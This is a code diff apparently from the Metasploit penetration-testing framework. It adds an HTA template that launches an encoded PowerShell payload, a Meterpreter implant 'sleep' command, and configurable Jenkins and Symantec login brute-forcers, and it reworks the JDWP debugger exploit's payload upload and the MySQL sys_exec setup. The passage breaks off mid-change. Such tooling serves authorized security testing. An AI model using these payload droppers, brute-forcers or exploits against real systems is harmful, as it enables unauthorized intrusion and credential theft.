diff --git a/Gemfile.lock b/Gemfile.lock
index 88322f33b0..2319aa9af3 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 0.0.5)
+      metasploit-payloads (= 0.0.7)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (0.0.5)
+    metasploit-payloads (0.0.7)
     metasploit_data_models (1.0.1)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
diff --git a/data/meterpreter/ext_server_stdapi.php b/data/meterpreter/ext_server_stdapi.php
index e2565f86d0..e3f72ee0d5 100755
--- a/data/meterpreter/ext_server_stdapi.php
+++ b/data/meterpreter/ext_server_stdapi.php
@@ -19,6 +19,7 @@ define("TLV_TYPE_FILE_NAME",           TLV_META_TYPE_STRING  | 1201);
 define("TLV_TYPE_FILE_PATH",           TLV_META_TYPE_STRING  | 1202);
 define("TLV_TYPE_FILE_MODE",           TLV_META_TYPE_STRING  | 1203);
 define("TLV_TYPE_FILE_SIZE",           TLV_META_TYPE_UINT    | 1204);
+define("TLV_TYPE_FILE_HASH",           TLV_META_TYPE_RAW     | 1206);
 
 define("TLV_TYPE_STAT_BUF",            TLV_META_TYPE_COMPLEX | 1220);
 
@@ -533,8 +534,7 @@ function stdapi_fs_md5($req, &$pkt) {
         $md5 = md5(file_get_contents($path));
     }
     $md5 = pack("H*", $md5);
-    # Ghetto abuse of file name type to indicate the md5 result
-    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
+    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_HASH, $md5));
     return ERROR_SUCCESS;
 }
 }
@@ -552,8 +552,7 @@ function stdapi_fs_sha1($req, &$pkt) {
         $sha1 = sha1(file_get_contents($path));
     }
     $sha1 = pack("H*", $sha1);
-    # Ghetto abuse of file name type to indicate the sha1 result
-    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
+    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_HASH, $sha1));
     return ERROR_SUCCESS;
 }
 }
diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py
index 48b4de307a..9e487280be 100644
--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -307,6 +307,7 @@ TLV_TYPE_FILE_NAME             = TLV_META_TYPE_STRING  | 1201
 TLV_TYPE_FILE_PATH             = TLV_META_TYPE_STRING  | 1202
 TLV_TYPE_FILE_MODE             = TLV_META_TYPE_STRING  | 1203
 TLV_TYPE_FILE_SIZE             = TLV_META_TYPE_UINT    | 1204
+TLV_TYPE_FILE_HASH             = TLV_META_TYPE_RAW     | 1206
 
 TLV_TYPE_STAT_BUF              = TLV_META_TYPE_COMPLEX | 1220
 
@@ -1011,7 +1012,7 @@ def stdapi_fs_md5(request, response):
 		m = md5.new()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
-	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
+	response += tlv_pack(TLV_TYPE_FILE_HASH, m.digest())
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
@@ -1061,7 +1062,7 @@ def stdapi_fs_sha1(request, response):
 		m = sha.new()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
-	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
+	response += tlv_pack(TLV_TYPE_FILE_HASH, m.digest())
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
diff --git a/data/templates/scripts/to_powershell.hta.template b/data/templates/scripts/to_powershell.hta.template
new file mode 100644
index 0000000000..1a39b4b19e
--- /dev/null
+++ b/data/templates/scripts/to_powershell.hta.template
@@ -0,0 +1,7 @@
+<script language="VBScript">
+  Set %{var_shell} = CreateObject("Wscript.Shell") 
+  Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
+  If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then
+    %{var_shell}.Run "%{powershell}"
+  End If
+</script>
diff --git a/lib/metasploit/framework/login_scanner/jenkins.rb b/lib/metasploit/framework/login_scanner/jenkins.rb
index 879989e0ef..3d5f338498 100644
--- a/lib/metasploit/framework/login_scanner/jenkins.rb
+++ b/lib/metasploit/framework/login_scanner/jenkins.rb
@@ -17,6 +17,10 @@ module Metasploit
           self.uri = "/j_acegi_security_check" if self.uri.nil?
           self.method = "POST" if self.method.nil?
 
+          if self.uri[0] != '/'
+            self.uri = "/#{self.uri}"
+          end
+
           super
         end
 
@@ -37,15 +41,15 @@ module Metasploit
             configure_http_client(cli)
             cli.connect
             req = cli.request_cgi({
-              'method'=>'POST',
-              'uri'=>'/j_acegi_security_check',
+              'method'=> method,
+              'uri'=> uri,
               'vars_post'=> {
                 'j_username' => credential.public,
-                'j_password'=>credential.private
+                'j_password'=> credential.private
                 }
             })
             res = cli.send_recv(req)
-            if res && !res.headers['location'].include?('loginError')
+            if res && res.headers['location'] && !res.headers['location'].include?('loginError')
               result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.headers)
             else
               result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb
index 96684afb8e..6842d7ab87 100644
--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -169,7 +169,7 @@ module Auxiliary::Report
   # @option opts [String] :user The username for the cred
   # @option opts [String] :pass The private part of the credential (e.g. password)
   def report_auth_info(opts={})
-    print_error "*** #{self.fullname} is still calling the deprecated report_auth_info method! This needs to be updated!"
+    print_warning("*** #{self.fullname} is still calling the deprecated report_auth_info method! This needs to be updated!")
     return if not db
     raise ArgumentError.new("Missing required option :host") if opts[:host].nil?
     raise ArgumentError.new("Missing required option :port") if (opts[:port].nil? and opts[:service].nil?)
diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb
index 23a26ad7c5..52647dda7d 100644
--- a/lib/msf/core/exploit/mysql.rb
+++ b/lib/msf/core/exploit/mysql.rb
@@ -162,8 +162,9 @@ module Exploit::Remote::MYSQL
   end
 
   def mysql_drop_and_create_sys_exec(soname)
-    res = mysql_query("DROP FUNCTION IF EXISTS sys_exec") # Already checked, actually
-    return false if res.nil?
+    # Just drop it. MySQL will always say "OK" anyway.
+    # See #5244
+    mysql_query("DROP FUNCTION IF EXISTS sys_exec")
 
     res = mysql_query("CREATE FUNCTION sys_exec RETURNS int SONAME '#{soname}'")
     return false if res.nil?
diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb
index 0731fbaca2..206433046e 100644
--- a/lib/msf/core/payload/stager.rb
+++ b/lib/msf/core/payload/stager.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 require 'msf/core'
 require 'msf/core/option_container'
+require 'msf/core/payload/transport_config'
 
 ###
 #
@@ -9,6 +10,8 @@ require 'msf/core/option_container'
 ###
 module Msf::Payload::Stager
 
+  include Msf::Payload::TransportConfig
+
   def initialize(info={})
     super
 
@@ -22,6 +25,28 @@ module Msf::Payload::Stager
 
   end
 
+  #
+  # Perform attempt at detecting the appropriate transport config.
+  # Call the determined config with passed options.
+  # Override this in stages/stagers to use specific transports
+  #
+  def transport_config(opts={})
+    if self.refname =~ /reverse_/
+        direction = 'reverse'
+    else
+        direction = 'bind'
+    end
+
+    if self.refname =~ /_tcp/
+        proto = 'tcp'
+    elsif self.refname =~ /_https/
+        proto = 'https'
+    else
+        proto = 'http'
+    end
+    send("transport_config_#{direction}_#{proto}", opts)
+  end 
+
   #
   # Sets the payload type to a stager.
   #
diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb
index caf7bb7703..4bc6c1fe7c 100644
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -276,12 +276,15 @@ module Msf
     # @return [String] A string containing the bytes of the payload in the format selected
     def generate_payload
       if platform == "java" or arch == "java" or payload.start_with? "java/"
-        generate_java_payload
+        p = generate_java_payload
+        cli_print "Payload size: #{p.length} bytes"
+        p
       else
         raw_payload = generate_raw_payload
         raw_payload = add_shellcode(raw_payload)
         encoded_payload = encode_payload(raw_payload)
         encoded_payload = prepend_nops(encoded_payload)
+        cli_print "Payload size: #{encoded_payload.length} bytes"
         format_payload(encoded_payload)
       end
     end
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 6b068528a2..5035f3f981 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1117,6 +1117,29 @@ require 'msf/core/exe/segment_appender'
                     method: 'reflection')
   end
 
+  def self.to_powershell_hta(framework, arch, code)
+    template_path = File.join(Msf::Config.data_directory,
+                              "templates",
+                              "scripts")
+
+    powershell = Rex::Powershell::Command.cmd_psh_payload(code,
+                    arch,
+                    template_path,
+                    encode_final_payload: true,
+                    remove_comspec: true,
+                    method: 'reflection')
+
+    # Intialize rig and value names
+    rig = Rex::RandomIdentifierGenerator.new()
+    rig.init_var(:var_shell)
+    rig.init_var(:var_fso)
+
+    hash_sub = rig.to_h
+    hash_sub[:powershell] = powershell
+
+    read_replace_script_template("to_powershell.hta.template", hash_sub)
+  end
+
   def self.to_win32pe_vbs(framework, code, opts = {})
     to_exe_vbs(to_win32pe(framework, code, opts), opts)
   end
@@ -1928,6 +1951,8 @@ require 'msf/core/exe/segment_appender'
       Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts)
     when 'psh-cmd'
       Msf::Util::EXE.to_powershell_command(framework, arch, code)
+    when 'hta-psh'
+      Msf::Util::EXE.to_powershell_hta(framework, arch, code)
     end
   end
 
@@ -1943,6 +1968,7 @@ require 'msf/core/exe/segment_appender'
       "exe-only",
       "exe-service",
       "exe-small",
+      "hta-psh",
       "loop-vbs",
       "macho",
       "msi",
diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb
index ede3250504..a06a19ebca 100644
--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -8,7 +8,6 @@ class Rex::Payloads::Meterpreter::Config
 
   include Msf::ReflectiveDLLLoader
 
-  UUID_SIZE = 64
   URL_SIZE = 512
   UA_SIZE = 256
   PROXY_HOST_SIZE = 128
@@ -48,7 +47,7 @@ private
   end
 
   def session_block(opts)
-    uuid = to_str(opts[:uuid].to_raw, UUID_SIZE)
+    uuid = opts[:uuid].to_raw
     exit_func = Msf::Payload::Windows.exit_types[opts[:exitfunk]]
 
     session_data = [
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 6a67471bbe..17ee24e02d 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -340,6 +340,18 @@ class ClientCore < Extension
     return true
   end
 
+  def transport_sleep(seconds)
+    return false if seconds == 0
+
+    request = Packet.create_request('core_transport_sleep')
+
+    # we're reusing the comms timeout setting here instead of
+    # creating a whole new TLV value
+    request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, seconds)
+    client.send_request(request)
+    return true
+  end
+
   def transport_next
     request = Packet.create_request('core_transport_next')
     client.send_request(request)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
index 47a45296a6..dc09045f7b 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
@@ -152,8 +152,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
 
     response = client.send_request(request)
 
-    # This is not really a file name, but a raw hash in bytes
-    return response.get_tlv_value(TLV_TYPE_FILE_NAME)
+    # older meterpreter binaries will send FILE_NAME containing the hash
+    hash = response.get_tlv_value(TLV_TYPE_FILE_HASH) ||
+      response.get_tlv_value(TLV_TYPE_FILE_NAME)
+    return hash
   end
 
   #
@@ -166,8 +168,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
 
     response = client.send_request(request)
 
-    # This is not really a file name, but a raw hash in bytes
-    return response.get_tlv_value(TLV_TYPE_FILE_NAME)
+    # older meterpreter binaries will send FILE_NAME containing the hash
+    hash = response.get_tlv_value(TLV_TYPE_FILE_HASH) ||
+      response.get_tlv_value(TLV_TYPE_FILE_NAME)
+    return hash
   end
 
   #
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
index 58335c5c83..11c5e9e8de 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
@@ -94,6 +94,8 @@ class Config
       'OS'              => response.get_tlv_value(TLV_TYPE_OS_NAME),
       'Architecture'    => response.get_tlv_value(TLV_TYPE_ARCHITECTURE),
       'System Language' => response.get_tlv_value(TLV_TYPE_LANG_SYSTEM),
+      'Domain'          => response.get_tlv_value(TLV_TYPE_DOMAIN),
+      'Logged On Users' => response.get_tlv_value(TLV_TYPE_LOGGED_ON_USER_COUNT)
     }
   end
 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
index 1a30b29529..048819ea3b 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -30,6 +30,7 @@ TLV_TYPE_FILE_PATH          = TLV_META_TYPE_STRING  | 1202
 TLV_TYPE_FILE_MODE          = TLV_META_TYPE_STRING  | 1203
 TLV_TYPE_FILE_SIZE          = TLV_META_TYPE_UINT    | 1204
 TLV_TYPE_FILE_SHORT_NAME    = TLV_META_TYPE_STRING  | 1205
+TLV_TYPE_FILE_HASH          = TLV_META_TYPE_RAW     | 1206
 
 TLV_TYPE_STAT_BUF           = TLV_META_TYPE_COMPLEX | 1220
 
@@ -112,12 +113,14 @@ TLV_TYPE_VALUE_DATA         = TLV_META_TYPE_RAW     | 1012
 TLV_TYPE_TARGET_HOST        = TLV_META_TYPE_STRING  | 1013
 
 # Config
-TLV_TYPE_COMPUTER_NAME      = TLV_META_TYPE_STRING  | 1040
-TLV_TYPE_OS_NAME            = TLV_META_TYPE_STRING  | 1041
-TLV_TYPE_USER_NAME          = TLV_META_TYPE_STRING  | 1042
-TLV_TYPE_ARCHITECTURE       = TLV_META_TYPE_STRING  | 1043
-TLV_TYPE_LANG_SYSTEM        = TLV_META_TYPE_STRING  | 1044
-TLV_TYPE_SID                = TLV_META_TYPE_STRING  | 1045
+TLV_TYPE_COMPUTER_NAME          = TLV_META_TYPE_STRING  | 1040
+TLV_TYPE_OS_NAME                = TLV_META_TYPE_STRING  | 1041
+TLV_TYPE_USER_NAME              = TLV_META_TYPE_STRING  | 1042
+TLV_TYPE_ARCHITECTURE           = TLV_META_TYPE_STRING  | 1043
+TLV_TYPE_LANG_SYSTEM            = TLV_META_TYPE_STRING  | 1044
+TLV_TYPE_SID                    = TLV_META_TYPE_STRING  | 1045
+TLV_TYPE_DOMAIN                 = TLV_META_TYPE_STRING  | 1046
+TLV_TYPE_LOGGED_ON_USER_COUNT   = TLV_META_TYPE_UINT    | 1047
 
 # Environment
 TLV_TYPE_ENV_VARIABLE       = TLV_META_TYPE_STRING  | 1100
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index f3d9b9b98a..459fb2d4bb 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -102,7 +102,7 @@ TLV_TYPE_TRANS_RETRY_WAIT    = TLV_META_TYPE_UINT   | 440
 TLV_TYPE_TRANS_GROUP         = TLV_META_TYPE_GROUP  | 441
 
 TLV_TYPE_MACHINE_ID          = TLV_META_TYPE_STRING | 460
-TLV_TYPE_UUID                = TLV_META_TYPE_STRING | 461
+TLV_TYPE_UUID                = TLV_META_TYPE_RAW    | 461
 
 TLV_TYPE_CIPHER_NAME         = TLV_META_TYPE_STRING | 500
 TLV_TYPE_CIPHER_PARAMETERS   = TLV_META_TYPE_GROUP  | 501
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index b87870d765..3d78b292e3 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -86,6 +86,10 @@ class Console::CommandDispatcher::Core
       # Yet to implement transport hopping for other meterpreters.
       # Works for posix and native windows though.
       c["transport"] = "Change the current transport mechanism"
+
+      # sleep functionality relies on the transport features, so only
+      # wire that in with the transport stuff.
+      c["sleep"] = "Force Meterpreter to go quiet, then re-establish session."
     end
 
     if (msf_loaded?)
@@ -494,6 +498,45 @@ class Console::CommandDispatcher::Core
 
   end
 
+  #
+  # Display help for the sleep.
+  #
+  def cmd_sleep_help
+    print_line('Usage: sleep <time>')
+    print_line
+    print_line('  time: Number of seconds to wait (positive integer)')
+    print_line
+    print_line('  This command tells Meterpreter to go to sleep for the specified')
+    print_line('  number of seconds. Sleeping will result in the transport being')
+    print_line('  shut down and restarted after the designated timeout.')
+  end
+
+  #
+  # Handle the sleep command.
+  #
+  def cmd_sleep(*args)
+    if args.length == 0
+      cmd_sleep_help
+      return
+    end
+
+    seconds = args.shift.to_i
+
+    if seconds <= 0
+      cmd_sleep_help
+      return
+    end
+
+    print_status("Telling the target instance to sleep for #{seconds} seconds ...")
+    if client.core.transport_sleep(seconds)
+      print_good("Target instance has gone to sleep, terminating current session.")
+      client.shutdown_passive_dispatcher
+      shell.stop
+    else
+      print_error("Target instance failed to go to sleep.")
+    end
+  end
+
   #
   # Arguments for transport switching
   #
@@ -634,8 +677,9 @@ class Console::CommandDispatcher::Core
 
       # next draw up a table of transport entries
       tbl = Rex::Ui::Text::Table.new(
-        'Indent'  => 4,
-        'Columns' => columns)
+        'SortIndex' => -1,       # disable any sorting
+        'Indent'    => 4,
+        'Columns'   => columns)
 
       first = true
       result[:transports].each do |t|
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index d02c0f8c8a..41d93d8c7c 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
   # Needed for Meterpreter on Windows, soon others.
-  spec.add_runtime_dependency 'metasploit-payloads', '0.0.5'
+  spec.add_runtime_dependency 'metasploit-payloads', '0.0.7'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler
diff --git a/modules/auxiliary/scanner/http/jenkins_login.rb b/modules/auxiliary/scanner/http/jenkins_login.rb
index 515618d3a5..66bd139aa9 100644
--- a/modules/auxiliary/scanner/http/jenkins_login.rb
+++ b/modules/auxiliary/scanner/http/jenkins_login.rb
@@ -23,6 +23,8 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
+        OptString.new('LOGIN_URL', [true, 'The URL that handles the login process', '/j_acegi_security_check']),
+        OptEnum.new('HTTP_METHOD', [true, 'The HTTP method to use for the login', 'POST', ['GET', 'POST']]),
         Opt::RPORT(8080)
       ], self.class)
 
@@ -44,6 +46,8 @@ class Metasploit3 < Msf::Auxiliary
 
     scanner = Metasploit::Framework::LoginScanner::Jenkins.new(
       configure_http_login_scanner(
+        uri: datastore['LOGIN_URL'],
+        method: datastore['HTTP_METHOD'],
         cred_details: cred_collection,
         stop_on_success: datastore['STOP_ON_SUCCESS'],
         bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb
index 334d03baa1..aa52f27881 100644
--- a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb
+++ b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb
@@ -32,33 +32,32 @@ class Metasploit3 < Msf::Auxiliary
   end
 
 
-  # Initializes CredentialCollection and SymantecWebGateway
-  def init(ip)
-    @cred_collection = Metasploit::Framework::CredentialCollection.new(
-      blank_passwords: datastore['BLANK_PASSWORDS'],
-      pass_file:       datastore['PASS_FILE'],
-      password:        datastore['PASSWORD'],
-      user_file:       datastore['USER_FILE'],
-      userpass_file:   datastore['USERPASS_FILE'],
-      username:        datastore['USERNAME'],
-      user_as_pass:    datastore['USER_AS_PASS']
-    )
-
-    @scanner = Metasploit::Framework::LoginScanner::SymantecWebGateway.new(
-      configure_http_login_scanner(
-        host: ip,
-        port: datastore['RPORT'],
-        cred_details:       @cred_collection,
-        stop_on_success:    datastore['STOP_ON_SUCCESS'],
-        bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],
-        connection_timeout: 5
+  def scanner(ip)
+    @scanner ||= lambda {
+      cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file:       datastore['PASS_FILE'],
+        password:        datastore['PASSWORD'],
+        user_file:       datastore['USER_FILE'],
+        userpass_file:   datastore['USERPASS_FILE'],
+        username:        datastore['USERNAME'],
+        user_as_pass:    datastore['USER_AS_PASS']
       )
-    )
-  end
+
+      return Metasploit::Framework::LoginScanner::SymantecWebGateway.new(
+        configure_http_login_scanner(
+          host: ip,
+          port: datastore['RPORT'],
+          cred_details:       cred_collection,
+          stop_on_success:    datastore['STOP_ON_SUCCESS'],
+          bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],
+          connection_timeout: 5
+        ))
+    }.call
+end
 
 
-  # Reports a good login credential
-  def do_report(ip, port, result)
+  def report_good_cred(ip, port, result)
     service_data = {
       address: ip,
       port: port,
@@ -86,39 +85,34 @@ class Metasploit3 < Msf::Auxiliary
   end
 
 
+  def report_bad_cred(ip, rport, result)
+    invalidate_login(
+      address: ip,
+      port: rport,
+      protocol: 'tcp',
+      public: result.credential.public,
+      private: result.credential.private,
+      realm_key: result.credential.realm_key,
+      realm_value: result.credential.realm,
+      status: result.status,
+      proof: result.proof
+    )
+  end
+
+
   # Attempts to login
   def bruteforce(ip)
-    @scanner.scan! do |result|
+    scanner(ip).scan! do |result|
       case result.status
       when Metasploit::Model::Login::Status::SUCCESSFUL
-        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
-        do_report(ip, rport, result)
+        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")
+        report_good_cred(ip, rport, result)
       when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
-        vprint_brute :level => :verror, :ip => ip, :msg => result.proof
-        invalidate_login(
-            address: ip,
-            port: rport,
-            protocol: 'tcp',
-            public: result.credential.public,
-            private: result.credential.private,
-            realm_key: result.credential.realm_key,
-            realm_value: result.credential.realm,
-            status: result.status,
-            proof: result.proof
-        )
+        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)
+        report_bad_cred(ip, rport, result)
       when Metasploit::Model::Login::Status::INCORRECT
-        vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
-        invalidate_login(
-            address: ip,
-            port: rport,
-            protocol: 'tcp',
-            public: result.credential.public,
-            private: result.credential.private,
-            realm_key: result.credential.realm_key,
-            realm_value: result.credential.realm,
-            status: result.status,
-            proof: result.proof
-        )
+        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")
+        report_bad_cred(ip, rport, result)
       end
     end
   end
@@ -126,9 +120,8 @@ class Metasploit3 < Msf::Auxiliary
 
   # Start here
   def run_host(ip)
-    init(ip)
-    unless @scanner.check_setup
-      print_brute :level => :error, :ip => ip, :msg => 'Target is not Symantec Web Gateway'
+    unless scanner(ip).check_setup
+      print_brute(:level => :error, :ip => ip, :msg => 'Target is not Symantec Web Gateway')
       return
     end
 
diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb
index 5a13314c87..a01e067e78 100644
--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
   SETSTATICVALUES_SIG       = [3, 2]
   INVOKESTATICMETHOD_SIG    = [3, 3]
   CREATENEWINSTANCE_SIG     = [3, 4]
+  ARRAYNEWINSTANCE_SIG      = [4, 1]
   REFERENCETYPE_SIG         = [9, 1]
   INVOKEMETHOD_SIG          = [9, 6]
   STRINGVALUE_SIG           = [10, 1]
@@ -41,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
   THREADSUSPEND_SIG         = [11, 2]
   THREADRESUME_SIG          = [11, 3]
   THREADSTATUS_SIG          = [11, 4]
+  ARRAYSETVALUES_SIG        = [13, 3]
   EVENTSET_SIG              = [15, 1]
   EVENTCLEAR_SIG            = [15, 2]
   EVENTCLEARALL_SIG         = [15, 3]
@@ -173,13 +175,30 @@ class Metasploit3 < Msf::Exploit::Remote
 
   # Reads packet response for JDWP protocol
   def read_reply(timeout = default_timeout)
-    response = sock.get_once(-1, timeout)
-    fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response
-    pktlen, id, flags, errcode = response.unpack('NNCn')
-    response.slice!(0..10)
-    if errcode != 0 && flags == REPLY_PACKET_TYPE
-      fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{errcode}")
+    length = sock.get_once(4, timeout)
+    fail_with(Failure::TimeoutExpired, "#{peer} - Not received response length") unless length
+    pkt_len = length.unpack('N')[0]
+    if pkt_len < 4
+      fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
     end
+    pkt_len = pkt_len - 4
+
+    response = sock.get_once(pkt_len, timeout)
+    fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response
+    while response.length < pkt_len
+      partial = sock.get_once(pkt_len, timeout)
+      fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
+      response << partial
+    end
+
+    fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length == pkt_len
+
+    id, flags, err_code = response.unpack('NCn')
+    response.slice!(0..6)
+    if err_code != 0 && flags == REPLY_PACKET_TYPE
+      fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
+    end
+
     response
   end
 
@@ -322,10 +341,6 @@ class Metasploit3 < Msf::Exploit::Remote
     "#{@vars["vm_name"]} - #{@vars["vm_version"]}"
   end
 
-  def is_java_eight
-    version.downcase =~ /1[.]8[.]/
-  end
-
   # Returns reference for all threads currently running on target VM
   def get_all_threads
     sock.put(create_packet(ALLTHREADS_SIG))
@@ -630,6 +645,36 @@ class Metasploit3 < Msf::Exploit::Remote
     buf
   end
 
+  # Creates a byte[]
+  def create_array(len)
+    target_class = get_class_by_name("[B")
+    fail_with(Failure::Unknown, "target_class is nil") if target_class.nil?
+
+    type_id = target_class["reftype_id"]
+    fail_with(Failure::Unknown, "type_id is nil") if type_id.nil?
+
+    data = format(@vars["referencetypeid_size"], type_id)
+    data << [len].pack('N')
+
+    sock.put(create_packet(ARRAYNEWINSTANCE_SIG, data))
+    buf = read_reply
+    buf
+  end
+
+  # Initializes the byte[] with values
+  def set_values(obj_id, args = [])
+    data = format(@vars["objectid_size"], obj_id)
+    data << [0].pack('N')
+    data << [args.length].pack('N')
+
+    args.each do |arg|
+      data << [arg].pack('C')
+    end
+
+    sock.put(create_packet(ARRAYSETVALUES_SIG, data))
+    read_reply
+  end
+
   def temp_path
     return nil unless datastore['TMP_PATH']
     unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
@@ -709,43 +754,14 @@ class Metasploit3 < Msf::Exploit::Remote
   # Stores the payload on a new string created in target VM
   def upload_payload(thread_id, pl_exe)
     size = @vars["objectid_size"]
-    if is_java_eight
-      runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64;", "getDecoder")
-      buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
-    else
-      runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>")
-      buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
-    end
-    unless buf[0] == [TAG_OBJECT].pack('C')
-      fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
-    end
 
-    decoder = unformat(size, buf[1..1+size-1])
-    if decoder.nil? || decoder == 0
-      fail_with(Failure::Unknown, "Failed to create Base64 decoder object")
-    end
-
-    cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}")
-    if cmd_obj_ids.length == 0
-      fail_with(Failure::Unknown, "Failed to allocate string for payload dumping")
-    end
-
-    cmd_obj_id = cmd_obj_ids[0]["obj_id"]
-    data = [TAG_OBJECT].pack('C')
-    data << format(size, cmd_obj_id)
-    data_array = [data]
-
-    if is_java_eight
-      runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64$Decoder;", "decode", "(Ljava/lang/String;)[B")
-    else
